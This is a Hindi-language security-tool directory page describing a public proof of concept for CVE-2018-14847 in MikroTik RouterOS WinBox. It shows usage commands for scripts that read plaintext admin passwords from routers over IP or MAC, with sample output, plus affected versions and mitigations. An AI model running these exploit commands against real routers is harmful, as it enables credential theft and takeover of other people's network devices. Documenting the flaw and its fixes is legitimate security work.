Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-14847 — MikroTik RouterOS Winbox में बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ने/लिखने की भेद्यता | Kitploit
उपकरण/GitHubGitHub/jas502n/cve-2018-14847
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubjas502n/cve-2018-14847

CVE-2018-14847

MikroTik RouterOS Winbox में बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ने/लिखने की भेद्यता

रिपॉजिटरी देखें
30107 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WinboxExploit

यह महत्वपूर्ण WinBox भेद्यता (CVE-2018-14847) का एक प्रूफ ऑफ कॉन्सेप्ट है जो सादे पाठ पासवर्डों के मनमाने फ़ाइल पढ़ने की अनुमति देता है।

ब्लॉग पोस्ट

https://n0p.me/winbox-bug-dissection/

आवश्यकताएँ

  • Python 3+

यह स्क्रिप्ट Python 2.x या उससे निचले संस्करण के साथ नहीं चलेगी।

कैसे उपयोग करें

स्क्रिप्ट का उपयोग कमांड लाइन में सरल तर्कों के साथ किया जाता है।

WinBox (TCP/IP)

भेद्यता का शोषण करें और पासवर्ड पढ़ें।

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

उदाहरण:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Layer 2)

आप फ़ाइलें तब भी निकाल सकते हैं जब डिवाइस के पास IP पता न हो।

स्थानीय रूप से जुड़े Mikrotik उपकरणों के लिए सरल खोज जाँच।

root@kitploit:~
python3 MACServerDiscover.py

उदाहरण:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

भेद्यता का शोषण करें और पासवर्ड पढ़ें।

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

उदाहरण:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

संवेदनशील संस्करण

2015-05-28 से 2018-04-20 तक के सभी RouterOS संस्करण इस शोषण के प्रति संवेदनशील हैं।

Mikrotik उपकरण जो RouterOS संस्करण चला रहे हैं:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

अधिक जानकारी के लिए देखें: https://blog.mikrotik.com/security/winbox-vulnerability.html

शमन तकनीकें

  • राउटर को एक RouterOS संस्करण में अपग्रेड करें जिसमें सुधार शामिल हो।
  • राउटर पर WinBox सेवा अक्षम करें।
  • आप निम्नलिखित के साथ WinBox सेवा तक पहुँच को विशिष्ट IP-पतों तक प्रतिबंधित कर सकते हैं:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • आप WinBox सेवा तक बाहरी पहुँच को अस्वीकार करने के लिए कुछ फ़िल्टर नियम (ACL) का उपयोग कर सकते हैं:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • mac-winbox सेवा तक पहुँच को अनुमत इंटरफ़ेस निर्दिष्ट करके सीमित किया जा सकता है:
root@kitploit:~
/tool mac-server mac-winbox

कॉपीराइट

  • ईरान के CERTCC (https://certcc.ir) द्वारा प्रायोजित। सर्वाधिकार सुरक्षित।
टूल डाउनलोड करें